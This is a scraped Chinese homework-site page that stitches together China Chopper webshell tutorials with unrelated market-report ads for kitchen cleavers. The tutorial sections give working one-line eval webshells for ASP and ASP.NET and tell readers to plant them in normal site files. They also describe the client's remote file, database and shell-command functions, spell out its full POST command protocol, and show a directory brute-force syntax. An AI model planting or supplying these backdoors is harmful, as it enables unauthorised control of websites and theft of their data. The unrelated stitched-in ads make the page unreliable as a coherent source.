作业帮中国菜刀
来源:学生作业帮助网 编辑:作业帮 时间:2024/09/24 13:14:23 体裁作文
篇一:中国菜刀使用教程
想学学怎么用菜刀,刚在网上搜到了菜刀的使用方法。怕有和我一样的新手不会用,所以发过来,算是给大家分享吧。首先说一下菜刀的功能,菜刀是用来连一句话的,asp、aspx、php的一句话菜刀都可以连,只是这几种一句话语句不一样。
asp的一句话是:<%eval request("pass")%>
aspx的一句话是:<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
php的一句话是:
这几个一句话的密码都是pass,也就是双引号或者单引号包含着的这部分,比如我想把asp的一句话的密码改成wc,那么改完之后就是这样的:
<%eval request("wc")%>
其他同理。
要想连一句话,你首先得把这个一句话插入到一个正常的网站文件中,asp的一句话插入到asp文件里,aspx的一句话插入到aspx文件里,php同理。
当然,你也可以把一句话单独写在一个文件里,比如你新建了一个asp文件,这个asp文件的全部内容就只有一个一句话,也是可以的。
插入了一句话木马,下面就是连接了。
在菜刀主界面,右击,选择“添加”,
在“地址”这里填上你插入一句话的文件的地址,后边的那个小框填的是你的一句话的密码,其他的不用填,
填完之后单击“添加”,就可以了。
添加完毕后,你的这个一句话的shell会显示到主界面里,右击它,选择“文件管理”,就可以看到网站上的文件了
在菜刀里还有一个功能,是“虚拟终端”,也是在右键菜单里的,这个相当于webshell中的执行DOS命令的功能
如果你的shell有权执行DOS命令,那么直接输入命令回车就可以看到结果了如果你的shell有权执行DOS命令,那么直接输入命令回车就可以看到结果了
篇二:中国菜刀使用方法
一、脚本客户端(包括但不限于EVAL)部分
1)基本信息
Eval服务端只需要简单的一行代码,即可用此程序实现常用的管理功能,功能代码二次编码后发送,过IDS的能力大幅提高。
目前支持的服务端脚本:PHP, ASP, ASP.NET,并且支持https安全连接的网站。
在服务端运行的代码如下: PHP: ASP: <%eval request("chopper")%> ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%> (注意: ASP.NET要单独一个文件或此文件也是Jscript脚本)
Customize: 自定义类型,功能代码在服务端保存,理论上支持所有动态脚本,只要
正确与菜刀进行交互即可。
此模式可按需定制,比如只要浏览目录,或是只要虚拟终端功能,代码可以很简短。
2)几大功能
在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码,
保存后即可使用文件管理,虚拟终端,数据库管理,自写脚本几大块功能。
1. 文件管理:[特色]缓存下载目录,并支持离线查看缓存目录; 2. 虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法), 超长命令会分割为5k字节一份,分别提交。
3. 数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS, 以及支持ADO方式连接的数据库。
如果精通SQL语法,何必还要PHPMYADMIN呢?而且,菜刀还支持任何脚本的数据库管理呢。
(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看)
4. 自写脚本:通过简单编码后提交用户自己的脚本到服务端执行,实现丰富的功能,也可选择发送到浏览器执行。
如果要写自己的CCC脚本,可以参考一下CCC目录下的示例代码, 相信你也可以写出功能丰富的脚本。
可以在官网下载别人的CCC脚本,或分享你的得意之作。 注意:由于服务器的安全设置,某些功能可能不能正常使用。
3) 配置信息填写说明
---------------------------------------------------------------------------------------
A) 数据库方面:
-----------------------------------------------------------------------------
PHP脚本:
数据库用户 连接数据库的用户名,如root
数据库密码
连接数据库的密码,如123455添加额外附加提交的数据,如ASP的新服务端是这样的:
<% Set o = Server.CreateObject("ScriptControl") o.language = "vbscript" o.addcode(Request("SC")) o.run "ff",Server,Response,Request,Application,Session,Error %> 那么,菜刀在配置处填入:
quest("pass")):end+function
虚拟终端默认命令设置示例:
3) HTTP登录验证
SHELL地址这样填 http://user:pass@maicaidao.com/server.asp
用户名密码中的特殊字符可用URL编码转换。
4) 数据导入:在SHELL列表界面,右键有一项菜单,可以把其它的菜刀库导入到当前分类中。
二、安全扫描
蜘蛛爬行,绑定域名查询,目录爆破。
命令解释:
A) 查单一IP的绑定域名
{reverse_ip} {url:/} B) 扫描本C段开放的WEB服务器,并查询绑定域名 {reverse_ip_c} {url:/} C) 只扫描本C段开放的WEB服务器 {reverse_ip_c} {url:/} {port} D) 蜘蛛爬行 {spider} {url:/} E) 蜘蛛爬行,并设定爬行范围 {spider} {url:/} {range:52cqvs.com} F) 蜘蛛爬行,过滤重复URL加快速度 加上 {filter} G) 爆破功能,%s为dict中的一行 flag:后面为返回的数据(含HTTP头部)中的特定关键字 加!!为不包含关键字为TRUE,否则包含关键字为TRUE list.txt为当前目录下的文件,可设为绝对路径,注意:不要包含太多的行。 注:从20100626版开始,list.txt一定要是UNICODE格式的文本文件 {crack} {url:http://%s/admin/} {flag:HTTP/1.1 200} {dict:list.txt}
{crack} {url:http://%s/admin/} {flag:!!HTTP/1.1 404} {dict:list.txt}
{crack} {url:/%s/} {flag:successfully} {dict:list.txt}
三、定时提醒
当闹钟来用吧, 周期:每月/每周/每日/只一次。
四、快速启动
一些常用的快捷方式放在这里,可以指定用户身份运行程序。这部分数据是加密存储的。 五、浏览器 就是一个专用的网页浏览器:Post浏览/自定义Cookies,/执行自定义脚本/自动刷新页如果有ip.dat库,在状态栏会显示此网站的IP,国家代码。 面/同IP网页搜索。
六、其它部分
等待加入。
----附
Customize模式菜刀和服务端通信接口-----------------------------------------------------------------
----------------------------------其它语言的服务端代码可按此接口来编写(请参照Customize.jsp/Customize.cfm)---------------------
例:菜刀客户端填写的密码为pass,网页编码选的是GB2312(Jsp服务端会用到此参数) 注:所有参数都以POST提交,返回的数据都要以->|为开始标记,|<-为结束标记 注:返回的错误信息开头包含ERROR://
注:\t代表制表符TAB,\r\n代表换行回车,\n代表回车
注:数据库配置信息是一个字符串,服务端脚本可以对此字符串格式进行自定义。
-----------------------------------------------------------------------------------------------------------------------------------
[得到当前目录的绝对路径]
提交:pass=A&z0=GB2312
返回:目录的绝对路径\t,如果是Windows系统后面接着加上驱动器列表
示例:c:\inetpub\wwwroot\ C:D:E:K:
示例:/var/www/html/
[目录浏览]
提交:pass=B&z0=GB2312&z1=目录绝对路径
返回:先目录后文件,目录名后要加/,文件名后不要加/
示例:
目录名/\t时间\t大小\t属性\n目录名/\t时间\t大小\t属性\n
文件名\t时间\t大小\t属性\n文件名\t时间\t大小\t属性\n
[读取文本文件]
提交:pass=C&z0=GB2312&z1=文件绝对路径
返回:文本文件的内容
[写入文本文件]
提交:pass=D&z0=GB2312&z1=文件绝对路径&z2=文件内容
返回:成功返回1,不成功返回错误信息
[删除文件或目录]
提交:pass=E&z0=GB2312&z1=文件或目录的绝对路径
返回:成功返回1,不成功返回错误信息
[下载文件]
提交:pass=F&z0=GB2312&z1=服务器文件的绝对路径
返回:要下载文件的内容
[上传文件]
提交:pass=G&z0=GB2312&z1=文件上传后的绝对路径&z2=文件内容(十六进制文本格式) 返回:要下载文件的内容
[复制文件或目录后粘贴]
提交:pass=H&z0=GB2312&z1=复制的绝对路径&z2=粘贴的绝对路径
返回:成功返回1,不成功返回错误信息
[文件或目录重命名]
提交:pass=I&z0=GB2312&z1=原名(绝对路径)&z2=新名(绝对路径)
返回:成功返回1,不成功返回错误信息
[新建目录]
提交:pass=J&z0=GB2312&z1=新目录名(绝对路径)
返回:成功返回1,不成功返回错误信息
[修改文件或目录时间]
提交:pass=K&z0=GB2312&z1=文件或目录的绝对路径&z2=时间(格式:yyyy-MM-dd HH:mm:ss) 返回:成功返回1,不成功返回错误信息
[下载文件到服务器]
提交:pass=L&z0=GB2312&z1=URL路径&z2=下载后保存的绝对路径
返回:成功返回1,不成功返回错误信息
[执行Shell命令(Shell路径前会根据服务器系统类型加上-c或/c参数)]
提交:pass=M&z0=GB2312&z1=(-c或/c)加Shell路径&z2=Shell命令
返回:命令执行结果
[得到数据库基本信息]
篇三:2015年中国菜刀市场行情动态报告
2015-2020年中国菜刀市场行情动态
及战略咨询报告
中国产业信息网
什么是行业研究报告
行业研究是通过深入研究某一行业发展动态、规模结构、竞争格局以及综合经济信息等,为企业自身发展或行业投资者等相关客户提供重要的参考依据。
企业通常通过自身的营销网络了解到所在行业的微观市场,但微观市场中的假象经常误导管理者对行业发展全局的判断和把握。一个全面竞争的时代,不但要了解自己现状,还要了解对手动向,更需要将整个行业系统的运行规律了然于胸。
行业研究报告的构成
一般来说,行业研究报告的核心内容包括以下五方面:
行业研究的目的及主要任务
行业研究是进行资源整合的前提和基础。
对企业而言,发展战略的制定通常由三部分构成:外部的行业研究、内部的企业资源评估以及基于两者之上的战略制定和设计。
行业与企业之间的关系是面和点的关系,行业的规模和发展趋势决定了企业的成长空间;企业的发展永远必须遵循行业的经营特征和规律。
行业研究的主要任务:
解释行业本身所处的发展阶段及其在国民经济中的地位 分析影响行业的各种因素以及判断对行业影响的力度 预测并引导行业的未来发展趋势 判断行业投资价值 揭示行业投资风险 为投资者提供依据
2015-2020年中国菜刀市场行情动态及战略咨询报告
【出版日期】2014年
【交付方式】Email电子版/特快专递
【价 格】纸介版:7000元 电子版:7200元 纸介+电子:7500元 【订购电话】400-600-8596 010-60343812 【报告编号】R306916
【报告链接】/research/201502/306916.html
《2015-2020年中国菜刀市场行情动态及战略咨询报告》主要分析了菜刀行业的市场规模、发展现状和品牌市场竞争态势与投资前景,同时对菜刀业的未来发展做出科学的趋势预测和专业的菜刀业数据分析,帮助客户评估菜刀业投资价值。
《2015-2020年中国菜刀市场行情动态及战略咨询报告》的数据主要依据国家统计局、国家海关总署、中国上市公司资讯以相关行业协会、国内外相关报刊杂志的基础信息以及专业研究单位等公布和提供的大量资料。为企业了解菜刀业、投资该领域提供决策参考依据。 报告目录:
第一章 菜刀业概述 第一节 菜刀业定义
第二节 菜刀业市场特点分析 一、产品特征
二、影响需求的关键因素 三、主要竞争因素
第三节 菜刀业发展周期分析
第二章 2013年中国菜刀业发展环境分析 第一节 2013年中国宏观经济环境分析 一、GDP历史变动轨迹分析
二、固定资产投资历史变动轨迹分析 三、2014年中国宏观经济发展预测分析 第二节 中国菜刀业主要法律法规及政策
第三节 2013年中国菜刀业社会环境发展分析 一、人口环境分析 二、教育环境分析 三、文化环境分析 四、生态环境分析
五、中国城镇化率
六、居民的各种消费观念和习惯
第三章 2013年中国菜刀业生产现状分析 第一节 中国菜刀业产能概况
一、2011-2014年中国菜刀业产能分析 二、2015-2020年中国菜刀业产能预测 第二节 中国菜刀业市场容量分析
一、2011-2014年中国菜刀业市场容量分析 二、产能配置与产能利用率调查
三、2015-2020年中国菜刀业市场容量预测 第三节 影响菜刀业供需状况的主要因素 一、2011-2014年中国菜刀业供需现状
二、2015-2020年中国菜刀业供需平衡趋势预测 第四章 2011-2014年中国菜刀所属行业数据监测分析 第一节 2011-2014年中国菜刀所属行业规模分析 一、企业数量分析 二、资产规模分析 三、销售规模分析 四、利润规模分析
第二节 2011-2014年中国菜刀所属行业产值分析 一、产成品分析
二、工业销售产值分析 三、出口交货值分析
第三节 2011-2014年中国菜刀所属行业成本费用分析 一、销售成本分析 二、销售费用分析 三、管理费用分析 四、财务费用分析
第四节 2011-2014年中国菜刀所属行业运营效益分析 一、盈利能力分析 二、偿债能力分析 三、运营能力分析 四、成长能力分析
第五章 中国菜刀业渠道分析
第一节 2013年中国菜刀业需求地域分布结构
第二节 2013年中国菜刀业重点区域市场消费情况分析 一、华东 二、中南 三、华北 四、西部
篇四:中国菜刀(网站管理软件)使用教程
中国菜刀
中文名:中国菜刀
英文名:ChinaChopper
大小:215kb
授权:免费软件
产地:国产软件
授权:免费软件
更新时间:2011/11/15
平台:WinXP, win7, WinAll
工具下载地址:http://pan.baidu.com/s/1da3Oq
简介:
产品名称:中国菜刀,不是原来切菜做饭的道具,而是一款专业的网站管理软件,用途广泛,使用方便,小巧 实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!程序大小:214K,在非简体中文环境下使用,自动切换到英文界面。UINCODE方式编 译,支持多国语言输入显示。
--------------------------------------------------------------------------
免责申明:请使用者注意使用环境并遵守国家相关法律法规! 由于使用不当造成的后果本厂家不承担任何责任!
--------------------------------------------------------------------------
功能介绍:
只要支持动态脚本的网站,都可以用中国菜刀来进行管理!主要功能有:文件管理,虚拟终端,数据库管理。
UINCODE方式编译,支持多国语言输入显示。
一、EVAL客户端部分
1)要了解的
服务端只需要简单的一行代码,即可用此程序实现常用的管理功能。 支持的服务端脚本:PHP, ASP,NET。
在服务端运行的代码如下:
PHP:
ASP: <%eval request("pass")%>
.NET: <%@ Page
Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%> (注意: .NET要单独一个文件或此文件也是Jscript语言)
2)怎么用
在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码,保存后即可使用文件管理,虚拟终端,数据库管理三大块功能。要是其它都没错误,那么可能就是你把语言编码选错了。
1. 文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;
2.虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法)
3.数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS 以入支持ADO方式连接的数据库。
(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看)
注意:由于服务器的安全设置,某些功能可能不能正常使用。
3) 关于配置信息怎么填?
A) 数据库方面:
PHP脚本:
数据库用户 连接数据库的用户名,如root
数据库密码
连接数据库的密码,如123455ASP和.NET脚本:
ADO连接各种数据库的方式不一样。如MSSQL的配置信息为
Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456
B) 其它方面:
添加额外附加提交的数据:应付这种情况:if
($_POST['action']=='test'){@eval($_POST['pass']);}
提交功能前先POST额外的数据包:会话期间只提交一次。
uid=user1&pwd=123456
二、网站蜘蛛
织出一张网站的目录结构。
下载的列表文件存在桌面,右键菜单/载入URL列表即可以根据地址得到目录结构。
三、定时提醒
当闹钟事使吧, 周期:每月/每周/每日/只一次。
四、快速启动
一些常用的快捷方式放在这里,可以指定用户身份运行程序。这部分数据是以加密存储的。
五、浏览器
地址栏输入HELP,更多精彩后续加入。
六、其它部分
等待加入。
附带工具
update.exe是wsc.exe的数据库wscdb迁移到菜刀的一个小工具。
把wscdb文件整到当前目录,运行update.exe得到新的数据库文件caidao.mdb 把菜刀的数据库db.mdb替换掉即可。
关键字:
文件管理,中国菜刀,数据库管理 ,网站管理 , 工具管理
篇五:2015年中国菜刀市场分析预测报告
2015-2020年中国菜刀市场分析预测
及未来发展趋势报告
中国产业信息网
什么是行业研究报告
行业研究是通过深入研究某一行业发展动态、规模结构、竞争格局以及综合经济信息等,为企业自身发展或行业投资者等相关客户提供重要的参考依据。
企业通常通过自身的营销网络了解到所在行业的微观市场,但微观市场中的假象经常误导管理者对行业发展全局的判断和把握。一个全面竞争的时代,不但要了解自己现状,还要了解对手动向,更需要将整个行业系统的运行规律了然于胸。
行业研究报告的构成
一般来说,行业研究报告的核心内容包括以下五方面:
行业研究的目的及主要任务
行业研究是进行资源整合的前提和基础。
对企业而言,发展战略的制定通常由三部分构成:外部的行业研究、内部的企业资源评估以及基于两者之上的战略制定和设计。
行业与企业之间的关系是面和点的关系,行业的规模和发展趋势决定了企业的成长空间;企业的发展永远必须遵循行业的经营特征和规律。
行业研究的主要任务:
解释行业本身所处的发展阶段及其在国民经济中的地位 分析影响行业的各种因素以及判断对行业影响的力度 预测并引导行业的未来发展趋势 判断行业投资价值 揭示行业投资风险 为投资者提供依据
2015-2020年中国菜刀市场分析预测及未来发展趋势
报告
【出版日期】2014年
【交付方式】Email电子版/特快专递
【价 格】纸介版:7000元 电子版:7200元 纸介+电子:7500元 【订购电话】400-600-8596 010-60343812 【报告编号】R291322
【报告链接】/research/201411/291322.html
《2015-2020年中国菜刀市场分析预测及未来发展趋势报告》主要分析了行业的市场规模、发展现状和品牌市场竞争态势与投资前景,同时对菜刀行业的未来发展做出科学的趋势预测和专业的菜刀行业数据分析,帮助客户评估菜刀行业投资价值。
《2015-2020年中国菜刀市场分析预测及未来发展趋势报告》的数据主要依据国家统计局、国家海关总署、中国上市公司资讯以相关行业协会、国内外相关报刊杂志的基础信息以及专业研究单位等公布和提供的大量资料。为企业了解菜刀行业、投资该领域提供决策参考依据。 报告目录:
第一章 菜刀行业概述 第一节 菜刀行业定义
第二节 菜刀行业市场特点分析 一、产品特征
二、影响需求的关键因素 三、主要竞争因素
第三节 菜刀行业发展周期分析
第二章 2013年中国菜刀行业发展环境分析 第一节 2013年中国宏观经济环境分析 一、GDP历史变动轨迹分析
二、固定资产投资历史变动轨迹分析 三、2014年中国宏观经济发展预测分析 第二节 中国菜刀行业主要法律法规及政策
第三节 2013年中国菜刀行业社会环境发展分析 一、人口环境分析 二、教育环境分析
三、文化环境分析 四、生态环境分析 五、中国城镇化率
六、居民的各种消费观念和习惯
第三章 2013年中国菜刀行业生产现状分析 第一节 中国菜刀行业产能概况
一、2010-2013年中国菜刀行业产能分析 二、2015-2020年中国菜刀行业产能预测 第二节 中国菜刀行业市场容量分析
一、2010-2013年中国菜刀行业市场容量分析 二、产能配置与产能利用率调查
三、2015-2020年中国菜刀行业市场容量预测 第三节 影响菜刀行业供需状况的主要因素 一、2010-2013年中国菜刀行业供需现状
二、2015-2020年中国菜刀行业供需平衡趋势预测 第四章 2010-2013年中国菜刀所属行业数据监测分析 第一节 2010-2013年中国菜刀所属行业规模分析 一、企业数量分析 二、资产规模分析 三、销售规模分析 四、利润规模分析
第二节 2010-2013年中国菜刀所属行业产值分析 一、产成品分析
二、工业销售产值分析 三、出口交货值分析
第三节 2010-2013年中国菜刀所属行业成本费用分析 一、销售成本分析 二、销售费用分析 三、管理费用分析 四、财务费用分析
第四节 2010-2013年中国菜刀所属行业运营效益分析 一、盈利能力分析 二、偿债能力分析 三、运营能力分析 四、成长能力分析
(转 载 于:wWW.smHAida.cOM 海达范文网:中国菜刀)第五章 中国菜刀行业渠道分析
第一节 2013年中国菜刀行业需求地域分布结构
第二节 2013年中国菜刀行业重点区域市场消费情况分析 一、华东 二、中南
体裁作文